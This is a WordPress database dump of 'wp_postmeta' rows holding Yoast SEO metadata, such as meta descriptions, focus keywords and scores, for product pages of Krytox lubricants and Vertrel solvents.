INSERT INTO `wp_postmeta` VALUES (19244, 708, '_yoast_wpseo_metadesc', 'Krytox XHT oils allow extended lubrication intervals and longer equipment life. The oil can begin to slowly evaporate at temperatures above 330 °C (626 °F), and this will occur at an increasing rate as temperatures increase. Relubrication could be required at these temperatures to achieve optimum life.'); 
INSERT INTO `wp_postmeta` VALUES (19245, 1121, '_yoast_wpseo_metadesc', 'Vertrel has similar solvency strength as nPB. Vertrel is non-flammable, safe, and requires no stabilizers, making Vertrel an ideal replacement for nPB.'); 
INSERT INTO `wp_postmeta` VALUES (19246, 1683, '_yoast_wpseo_metadesc', 'A nonflammable, translucent dry film coating that has excellent lubrication and anti-stick properties. The coating is clean, non-oily, nonstaining, chemically inert, and can function in continuous use in temperatures up to 392ºF/200ºC. It is oxygen safe and LOX compatible, as determined per ASTM G86. No ODC (ozone depleting chemicals).'); 
INSERT INTO `wp_postmeta` VALUES (19247, 659, '_yoast_wpseo_metadesc', 'Krytox XHT-S and XHT-SX greases are special high temperature greases with low oil evaporation that provide long bearing life.'); 
INSERT INTO `wp_postmeta` VALUES (19248, 671, '_yoast_wpseo_metadesc', 'Krytox XHT-SX grease is a special high temperature greases with low oil evaporation that provide long bearing life and are compatible with most elastomers.'); 
INSERT INTO `wp_postmeta` VALUES (19249, 992, '_yoast_wpseo_metadesc', 'Krytox lubricant XP products are high-quality, ultra high performance, anti-friction and anti-rust lubricants. Formulated with synthetic PFPE fluids, soluble additives, and the most efficient polytetrafluoroethylene (PTFE) thickeners available, these lubricants exceed the performance requirements of most demanding applications.'); 
INSERT INTO `wp_postmeta` VALUES (19250, 993, '_yoast_wpseo_metadesc', 'Krytox lubricant XP products are high-quality, ultra high performance, anti-friction and anti-rust lubricants. Formulated with synthetic PFPE fluids, soluble additives, and the most efficient polytetrafluoroethylene (PTFE) thickeners available, these lubricants exceed the performance requirements of most demanding applications.'); 
INSERT INTO `wp_postmeta` VALUES (19251, 995, '_yoast_wpseo_metadesc', 'Krytox lubricant XP products are high-quality, ultra high performance, anti-friction and anti-rust lubricants. Formulated with synthetic PFPE fluids, soluble additives, and the most efficient polytetrafluoroethylene (PTFE) thickeners available, these lubricants exceed the performance requirements of most demanding applications.'); 
INSERT INTO `wp_postmeta` VALUES (19252, 996, '_yoast_wpseo_metadesc', 'Krytox lubricant XP products are high-quality, ultra high performance, anti-friction and anti-rust lubricants. Formulated with synthetic PFPE fluids, soluble additives, and the most efficient polytetrafluoroethylene (PTFE) thickeners available, these lubricants exceed the performance requirements of most demanding applications.'); 
INSERT INTO `wp_postmeta` VALUES (19253, 997, '_yoast_wpseo_metadesc', 'Krytox lubricant XP products are high-quality, ultra high performance, anti-friction and anti-rust lubricants. Formulated with synthetic PFPE fluids, soluble additives, and the most efficient polytetrafluoroethylene (PTFE) thickeners available, these lubricants exceed the performance requirements of most demanding applications.'); 
INSERT INTO `wp_postmeta` VALUES (19254, 998, '_yoast_wpseo_metadesc', 'Krytox lubricant XP products are high-quality, ultra high performance, anti-friction and anti-rust lubricants. Formulated with synthetic PFPE fluids, soluble additives, and the most efficient polytetrafluoroethylene (PTFE) thickeners available, these lubricants exceed the performance requirements of most demanding applications.'); 
INSERT INTO `wp_postmeta` VALUES (19255, 999, '_yoast_wpseo_metadesc', 'Krytox lubricant XP products are high-quality, ultra high performance, anti-friction and anti-rust lubricants. Formulated with synthetic PFPE fluids, soluble additives, and the most efficient polytetrafluoroethylene (PTFE) thickeners available, these lubricants exceed the performance requirements of most demanding applications.'); 
INSERT INTO `wp_postmeta` VALUES (19256, 1001, '_yoast_wpseo_metadesc', 'Krytox lubricant XP products are high-quality, ultra high performance, anti-friction and anti-rust lubricants. Formulated with synthetic PFPE fluids, soluble additives, and the most efficient polytetrafluoroethylene (PTFE) thickeners available, these lubricants exceed the performance requirements of most demanding applications.'); 
INSERT INTO `wp_postmeta` VALUES (19257, 1002, '_yoast_wpseo_metadesc', 'Krytox lubricant XP products are formulated using patented soluble additives. Typical perfluoropolyether (PFPE) greases use solid additives for anti-rust, anti-wear, or extreme pressure performance. These components are mixed into the grease and held in place by the grease thickener. In the past, there were no additives available for the oil, because of the inertness of the oil and insolubility of available additives. The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties.'); 
INSERT INTO `wp_postmeta` VALUES (19263, 1009, '_yoast_wpseo_metadesc', 'Krytox lubricant XP products are formulated using patented soluble additives. Typical perfluoropolyether (PFPE) greases use solid additives for anti-rust, anti-wear, or extreme pressure performance. These components are mixed into the grease and held in place by the grease thickener. In the past, there were no additives available for the oil, because of the inertness of the oil and insolubility of available additives. The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties.'); 
INSERT INTO `wp_postmeta` VALUES (19264, 1010, '_yoast_wpseo_metadesc', 'Krytox lubricant XP products are formulated using patented soluble additives. Typical perfluoropolyether (PFPE) greases use solid additives for anti-rust, anti-wear, or extreme pressure performance. These components are mixed into the grease and held in place by the grease thickener. In the past, there were no additives available for the oil, because of the inertness of the oil and insolubility of available additives. The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties.'); 
INSERT INTO `wp_postmeta` VALUES (19265, 1011, '_yoast_wpseo_metadesc', 'Krytox lubricant XP products are formulated using patented soluble additives. Typical perfluoropolyether (PFPE) greases use solid additives for anti-rust, anti-wear, or extreme pressure performance. These components are mixed into the grease and held in place by the grease thickener. In the past, there were no additives available for the oil, because of the inertness of the oil and insolubility of available additives. The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties.'); 
INSERT INTO `wp_postmeta` VALUES (19266, 1014, '_yoast_wpseo_metadesc', 'Krytox lubricant XP products are formulated using patented soluble additives. Typical perfluoropolyether (PFPE) greases use solid additives for anti-rust, anti-wear, or extreme pressure performance. These components are mixed into the grease and held in place by the grease thickener. In the past, there were no additives available for the oil, because of the inertness of the oil and insolubility of available additives. The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties.'); 
INSERT INTO `wp_postmeta` VALUES (19267, 1012, '_yoast_wpseo_metadesc', 'Krytox XP 2A5 can be used in similar applications where bearings operate under high loads and the potential for corrosion exists.'); 
INSERT INTO `wp_postmeta` VALUES (19268, 1015, '_yoast_wpseo_metadesc', 'Krytox lubricant XP products are formulated using patented soluble additives. Typical perfluoropolyether (PFPE) greases use solid additives for anti-rust, anti-wear, or extreme pressure performance. These components are mixed into the grease and held in place by the grease thickener. In the past, there were no additives available for the oil, because of the inertness of the oil and insolubility of available additives. The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties.'); 
INSERT INTO `wp_postmeta` VALUES (19269, 1016, '_yoast_wpseo_metadesc', 'Krytox lubricant XP products are formulated using patented soluble additives. Typical perfluoropolyether (PFPE) greases use solid additives for anti-rust, anti-wear, or extreme pressure performance. These components are mixed into the grease and held in place by the grease thickener. In the past, there were no additives available for the oil, because of the inertness of the oil and insolubility of available additives. The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties.'); 
INSERT INTO `wp_postmeta` VALUES (19270, 347, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (19271, 769, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (19272, 783, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19273, 783, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 202'); 
INSERT INTO `wp_postmeta` VALUES (19274, 783, '_yoast_wpseo_focuskw', 'Krytox GPL 202'); 
INSERT INTO `wp_postmeta` VALUES (19275, 783, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19276, 783, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19277, 784, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19278, 784, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 203'); 
INSERT INTO `wp_postmeta` VALUES (19279, 784, '_yoast_wpseo_focuskw', 'Krytox GPL 203'); 
INSERT INTO `wp_postmeta` VALUES (19280, 784, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19281, 784, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19282, 788, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19283, 788, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 204'); 
INSERT INTO `wp_postmeta` VALUES (19284, 788, '_yoast_wpseo_focuskw', 'Krytox GPL 204'); 
INSERT INTO `wp_postmeta` VALUES (19285, 788, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19286, 788, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19287, 789, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19288, 789, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 205'); 
INSERT INTO `wp_postmeta` VALUES (19289, 789, '_yoast_wpseo_focuskw', 'Krytox GPL 205'); 
INSERT INTO `wp_postmeta` VALUES (19290, 789, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19291, 789, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19292, 789, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (19293, 790, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19294, 790, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 206'); 
INSERT INTO `wp_postmeta` VALUES (19295, 790, '_yoast_wpseo_focuskw', 'Krytox GPL 206'); 
INSERT INTO `wp_postmeta` VALUES (19296, 790, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19297, 790, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19298, 814, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19299, 814, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 207'); 
INSERT INTO `wp_postmeta` VALUES (19300, 814, '_yoast_wpseo_focuskw', 'Krytox GPL 207'); 
INSERT INTO `wp_postmeta` VALUES (19301, 814, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19302, 814, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19303, 402, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19304, 402, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 210'); 
INSERT INTO `wp_postmeta` VALUES (19305, 402, '_yoast_wpseo_focuskw', 'Krytox GPL 210'); 
INSERT INTO `wp_postmeta` VALUES (19306, 402, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19307, 402, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19308, 818, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19309, 818, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 211'); 
INSERT INTO `wp_postmeta` VALUES (19310, 818, '_yoast_wpseo_focuskw', 'Krytox GPL 211'); 
INSERT INTO `wp_postmeta` VALUES (19311, 818, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19312, 818, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19313, 818, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (19314, 819, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19315, 819, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 212'); 
INSERT INTO `wp_postmeta` VALUES (19316, 819, '_yoast_wpseo_focuskw', 'Krytox GPL 212'); 
INSERT INTO `wp_postmeta` VALUES (19317, 819, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19318, 819, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19319, 819, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (19326, 821, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19327, 821, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 214'); 
INSERT INTO `wp_postmeta` VALUES (19328, 821, '_yoast_wpseo_focuskw', 'Krytox GPL 214'); 
INSERT INTO `wp_postmeta` VALUES (19329, 821, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19330, 821, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19331, 822, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19332, 822, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 215'); 
INSERT INTO `wp_postmeta` VALUES (19333, 822, '_yoast_wpseo_focuskw', 'Krytox GPL 215'); 
INSERT INTO `wp_postmeta` VALUES (19334, 822, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19335, 822, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19336, 822, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (19337, 823, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19338, 823, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 216'); 
INSERT INTO `wp_postmeta` VALUES (19339, 823, '_yoast_wpseo_focuskw', 'Krytox GPL 216'); 
INSERT INTO `wp_postmeta` VALUES (19340, 823, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19341, 823, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19342, 824, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19343, 824, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 217'); 
INSERT INTO `wp_postmeta` VALUES (19344, 824, '_yoast_wpseo_focuskw', 'Krytox GPL 217'); 
INSERT INTO `wp_postmeta` VALUES (19345, 824, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19346, 824, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19347, 789, '_wp_old_slug', 'gpl-205'); 
INSERT INTO `wp_postmeta` VALUES (19348, 790, '_wp_old_slug', 'gpl-206'); 
INSERT INTO `wp_postmeta` VALUES (19349, 790, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (19350, 644, '_wp_old_slug', '240ac'); 
INSERT INTO `wp_postmeta` VALUES (19351, 644, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19352, 644, '_yoast_wpseo_focuskw_text_input', 'Krytox 240AC'); 
INSERT INTO `wp_postmeta` VALUES (19353, 644, '_yoast_wpseo_focuskw', 'Krytox 240AC'); 
INSERT INTO `wp_postmeta` VALUES (19354, 644, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19355, 644, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19356, 638, '_wp_old_slug', '638'); 
INSERT INTO `wp_postmeta` VALUES (19357, 638, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19358, 638, '_yoast_wpseo_focuskw_text_input', 'Krytox 240AZ'); 
INSERT INTO `wp_postmeta` VALUES (19359, 638, '_yoast_wpseo_focuskw', 'Krytox 240AZ'); 
INSERT INTO `wp_postmeta` VALUES (19360, 638, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19361, 638, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19362, 643, '_wp_old_slug', '240ab'); 
INSERT INTO `wp_postmeta` VALUES (19363, 643, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19364, 643, '_yoast_wpseo_focuskw_text_input', 'Krytox 240AB'); 
INSERT INTO `wp_postmeta` VALUES (19365, 643, '_yoast_wpseo_focuskw', 'Krytox 240AB'); 
INSERT INTO `wp_postmeta` VALUES (19366, 643, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19367, 643, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19368, 644, '_yoast_wpseo_linkdex', '91'); 
INSERT INTO `wp_postmeta` VALUES (19369, 638, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (19370, 643, '_yoast_wpseo_linkdex', '94'); 
INSERT INTO `wp_postmeta` VALUES (19371, 642, '_wp_old_slug', '240aa'); 
INSERT INTO `wp_postmeta` VALUES (19372, 642, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19373, 642, '_yoast_wpseo_focuskw_text_input', 'Krytox 240AA'); 
INSERT INTO `wp_postmeta` VALUES (19374, 642, '_yoast_wpseo_focuskw', 'Krytox 240AA'); 
INSERT INTO `wp_postmeta` VALUES (19375, 642, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19376, 642, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19377, 645, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19378, 645, '_yoast_wpseo_focuskw_text_input', 'Krytox 240AD'); 
INSERT INTO `wp_postmeta` VALUES (19379, 645, '_yoast_wpseo_focuskw', 'Krytox 240AD'); 
INSERT INTO `wp_postmeta` VALUES (19380, 645, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19381, 645, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19382, 645, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (19383, 647, '_wp_old_slug', '250ac'); 
INSERT INTO `wp_postmeta` VALUES (19384, 647, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19385, 647, '_yoast_wpseo_focuskw_text_input', 'Krytox 250AC'); 
INSERT INTO `wp_postmeta` VALUES (19386, 647, '_yoast_wpseo_focuskw', 'Krytox 250AC'); 
INSERT INTO `wp_postmeta` VALUES (19387, 647, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19388, 647, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19389, 648, '_wp_old_slug', '250ad'); 
INSERT INTO `wp_postmeta` VALUES (19390, 648, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19391, 648, '_yoast_wpseo_focuskw_text_input', 'Krytox 250AD'); 
INSERT INTO `wp_postmeta` VALUES (19392, 648, '_yoast_wpseo_focuskw', 'Krytox 250AD'); 
INSERT INTO `wp_postmeta` VALUES (19393, 648, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19394, 648, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19395, 646, '_wp_old_slug', '250az'); 
INSERT INTO `wp_postmeta` VALUES (19396, 646, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19397, 646, '_yoast_wpseo_focuskw_text_input', 'Krytox 250AZ'); 
INSERT INTO `wp_postmeta` VALUES (19398, 646, '_yoast_wpseo_focuskw', 'Krytox 250AZ'); 
INSERT INTO `wp_postmeta` VALUES (19399, 646, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19400, 646, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19401, 649, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19402, 649, '_yoast_wpseo_focuskw_text_input', 'Krytox 280AB'); 
INSERT INTO `wp_postmeta` VALUES (19403, 649, '_yoast_wpseo_focuskw', 'Krytox 280AB'); 
INSERT INTO `wp_postmeta` VALUES (19404, 649, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19405, 649, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19406, 651, '_wp_old_slug', '280ac'); 
INSERT INTO `wp_postmeta` VALUES (19407, 651, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19408, 651, '_yoast_wpseo_focuskw_text_input', 'Krytox 280AC'); 
INSERT INTO `wp_postmeta` VALUES (19409, 651, '_yoast_wpseo_focuskw', 'Krytox 280AC'); 
INSERT INTO `wp_postmeta` VALUES (19410, 651, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19411, 651, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19412, 651, '_yoast_wpseo_linkdex', '49'); 
INSERT INTO `wp_postmeta` VALUES (19413, 653, '_wp_old_slug', '283aa'); 
INSERT INTO `wp_postmeta` VALUES (19414, 653, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19415, 653, '_yoast_wpseo_focuskw_text_input', 'Krytox 283AA'); 
INSERT INTO `wp_postmeta` VALUES (19416, 653, '_yoast_wpseo_focuskw', 'Krytox 283AA'); 
INSERT INTO `wp_postmeta` VALUES (19417, 653, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19418, 653, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19419, 654, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19420, 654, '_yoast_wpseo_focuskw_text_input', 'Krytox 283AB'); 
INSERT INTO `wp_postmeta` VALUES (19421, 654, '_yoast_wpseo_focuskw', 'Krytox 283AB'); 
INSERT INTO `wp_postmeta` VALUES (19422, 654, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19423, 654, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19424, 654, '_wp_old_slug', '283ab'); 
INSERT INTO `wp_postmeta` VALUES (19425, 654, '_yoast_wpseo_linkdex', '49'); 
INSERT INTO `wp_postmeta` VALUES (19426, 1842, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19427, 1842, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19428, 118, '_footer', 'normal'); 
INSERT INTO `wp_postmeta` VALUES (19430, 1662, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19431, 1662, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19432, 1662, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19433, 1664, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19434, 1664, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19435, 1664, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19436, 1666, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19437, 1666, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19438, 1666, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19439, 1088, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19440, 1088, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 246'); 
INSERT INTO `wp_postmeta` VALUES (19441, 1088, '_yoast_wpseo_focuskw', 'Krytox GPL 246'); 
INSERT INTO `wp_postmeta` VALUES (19442, 1088, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19443, 1088, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19444, 1111, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19445, 1111, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 407'); 
INSERT INTO `wp_postmeta` VALUES (19446, 1111, '_yoast_wpseo_focuskw', 'Krytox GPL 407'); 
INSERT INTO `wp_postmeta` VALUES (19447, 1111, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19448, 1111, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19449, 1111, '_yoast_wpseo_linkdex', '76'); 
INSERT INTO `wp_postmeta` VALUES (19450, 421, '_wp_old_slug', 'gpl-100'); 
INSERT INTO `wp_postmeta` VALUES (19451, 421, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19452, 421, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 100'); 
INSERT INTO `wp_postmeta` VALUES (19453, 421, '_yoast_wpseo_focuskw', 'Krytox GPL 100'); 
INSERT INTO `wp_postmeta` VALUES (19454, 421, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19455, 421, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19456, 436, '_wp_old_slug', 'gpl-101'); 
INSERT INTO `wp_postmeta` VALUES (19457, 436, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19458, 436, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 101'); 
INSERT INTO `wp_postmeta` VALUES (19459, 436, '_yoast_wpseo_focuskw', 'Krytox GPL 101'); 
INSERT INTO `wp_postmeta` VALUES (19460, 436, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19461, 436, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19462, 437, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19463, 437, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 102'); 
INSERT INTO `wp_postmeta` VALUES (19464, 437, '_yoast_wpseo_focuskw', 'Krytox GPL 102'); 
INSERT INTO `wp_postmeta` VALUES (19465, 437, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19466, 437, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19467, 438, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19468, 438, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 103'); 
INSERT INTO `wp_postmeta` VALUES (19469, 438, '_yoast_wpseo_focuskw', 'Krytox GPL 103'); 
INSERT INTO `wp_postmeta` VALUES (19470, 438, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19471, 438, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19472, 438, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (19473, 439, '_wp_old_slug', 'gpl-104'); 
INSERT INTO `wp_postmeta` VALUES (19474, 439, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19475, 439, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 104'); 
INSERT INTO `wp_postmeta` VALUES (19476, 439, '_yoast_wpseo_focuskw', 'Krytox GPL 104'); 
INSERT INTO `wp_postmeta` VALUES (19477, 439, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19478, 439, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19479, 440, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19480, 440, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 105'); 
INSERT INTO `wp_postmeta` VALUES (19481, 440, '_yoast_wpseo_focuskw', 'Krytox GPL 105'); 
INSERT INTO `wp_postmeta` VALUES (19482, 440, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19483, 440, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19484, 441, '_wp_old_slug', 'gpl-106'); 
INSERT INTO `wp_postmeta` VALUES (19485, 441, '_yoast_wpseo_primary_product_cat', ''); 
